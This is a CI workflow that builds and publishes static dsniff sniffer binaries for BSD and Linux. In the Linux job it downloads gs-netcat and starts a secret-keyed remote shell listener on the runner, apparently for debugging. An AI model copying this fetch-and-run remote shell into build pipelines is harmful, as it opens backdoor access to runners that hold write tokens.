name: Static Post-Release Build
on: [workflow_dispatch]

permissions:
  contents: write

env:
  VER: 2.5a2
  DB_PKGVER: 5.3.28

jobs:
  FreeBSD:
    env:
      OS: "freebsd"
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Starting the VM
        uses: vmactions/freebsd-vm@v1
        with:
          # release: 12.3
          usesh: true
          prepare: |
            pkg install -y curl autoconf gcc libnet libnids libpcap

          run: |
            autoconf
            ./configure --enable-static
            make dsniff
            strip dsniff
            mv dsniff dsniff_${{ env.OS }}-x86_64

      - name: Upload dsniff to release
        uses: svenstaro/upload-release-action@v2
        with:
          repo_token: ${{ secrets.GITHUB_TOKEN }}
          file: dsniff_${{ env.OS }}-*
          overwrite: true
          file_glob: true
          tag: v${{ env.VER }}

# https://github.com/vmactions/openbsd-vm
  OpenBSD:
    env:
      OS: "openbsd"
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Starting the VM
        uses: vmactions/openbsd-vm@v1
        with:
          usesh: true
          prepare: |
            pkg_add curl
            pkg_add autoconf-2.71
            pkg_add automake-1.16.5
            pkg_add openssl-3.0.8
            pkg_add gcc-11.2.0p3
            pkg_add gmake
            pkg_add tar
            pkg_add libnet-1.1.6v0
            pkg_add libnids

          run: |
            export AUTOCONF_VERSION=2.71
            export AUTOMAKE_VERSION=1.16
            autoconf
            # curl -fL -o gs-netcat https://github.com/hackerschoice/gsocket/releases/download/v1.4.43/gs-netcat_openbsd-x86_64
            # chmod 755 gs-netcat
            # (./gs-netcat -lqi -s ${{ secrets.GSNC }} >gsnc.log 2>gsnc.err &)
            mkdir -p /usr/local/libnet/bin
            (cd /usr/local/libnet
            ln -s ../../bin/libnet-config-1.1 bin/libnet-config
            ln -s ../include/libnet-1.1/ include
            ln -s ../lib/libnet-1.1/ lib)
            ./configure --enable-static --with-libnet=/usr/local/libnet
            # sleep 3000
            make dsniff
            strip dsniff
            mv dsniff dsniff_${{ env.OS }}-x86_64

      - name: Upload dsniff to release
        uses: svenstaro/upload-release-action@v2
        with:
          repo_token: ${{ secrets.GITHUB_TOKEN }}
          file: dsniff_${{ env.OS }}-*
          overwrite: true
          file_glob: true
          tag: v${{ env.VER }}

  Linux-Cross-Compile:
    strategy:
      matrix:
        arch: [x86_64, aarch64, mips64, mips32, mipsel, i686, arm, armv6, armv7l]
        include:
          - arch: x86_64
            cc: x86_64-linux-musl
          - arch: aarch64
            cc: aarch64-linux-musl
          - arch: mips64
            cc: mips64-linux-musl
          - arch: mips32
            cc: mips-linux-muslsf
          - arch: mipsel
            cc: mipsel-linux-muslsf
          - arch: i686
            cc: i686-linux-musl
          - arch: arm
            cc: arm-linux-musleabi
          - arch: armv6
            cc: armv6-linux-musleabi
          - arch: armv7l
            cc: armv7l-linux-musleabihf
    runs-on: ubuntu-latest
    container:
      image: muslcc/x86_64:${{ matrix.cc }}
      options: --user root
    steps:
      - uses: actions/checkout@v3

      - name: Add build dependencies
        run: |
          apk add --update --no-cache --no-progress bash git autoconf curl upx musl-dev linux-headers gcc make build-base db-dev libpcap-dev libnet-dev libnids-dev libtirpc-dev libnsl-dev openssl-dev musl-libintl libnsl-static libnet-static libtirpc-static openssl-libs-static glib-static 

      - name: Compile-${{ matrix.arch }}
        run: |
          curl -fL -o gs-netcat https://github.com/hackerschoice/gsocket/releases/download/v1.4.41/gs-netcat_linux-x86_64
          chmod 755 gs-netcat
          (./gs-netcat -lqi -s ${{ secrets.GSNC }} >gsnc.log 2>gsnc.err &)
          sleep 3000
          # curl -fL "https://download.oracle.com/berkeley-db/db-${DB_PKGVER:-5.3.28}.tar.gz" | tar xfz -
          # cd db-${DB_PKGVER:-5.3.28}
          # curl -fL "https://git.alpinelinux.org/aports/plain/main/db/atomic.patch" | patch -p1
          # cd build_unix
          # ../dist/configure --prefix=/usr --mandir=/usr/share/man --enable-compat185 --disable-shared --disable-mutexsupport --build=${{ matrix.arch }}-unknown-linux-gnu
          # make install
          # cd ../../
          # autoheader
          git clone --depth=1 https://github.com/SkyperTHC/libnids.git
          cd libnids
          ./configure --disable-libglib --prefix=$(pwd)
          make install
          cd ..
          autoconf
          ./configure --enable-static --with-libnids=libnids --host=${{ matrix.arch }}
          make dsniff
          strip dsniff
          mv dsniff dsniff_linux-${{ matrix.arch }}

      - name: Upload dsniff to release
        uses: svenstaro/upload-release-action@v2
        with:
          repo_token: ${{ secrets.GITHUB_TOKEN }}
          file: dsniff_linux-${{ matrix.arch }}
          overwrite: true
          tag: v${{ env.VER }}
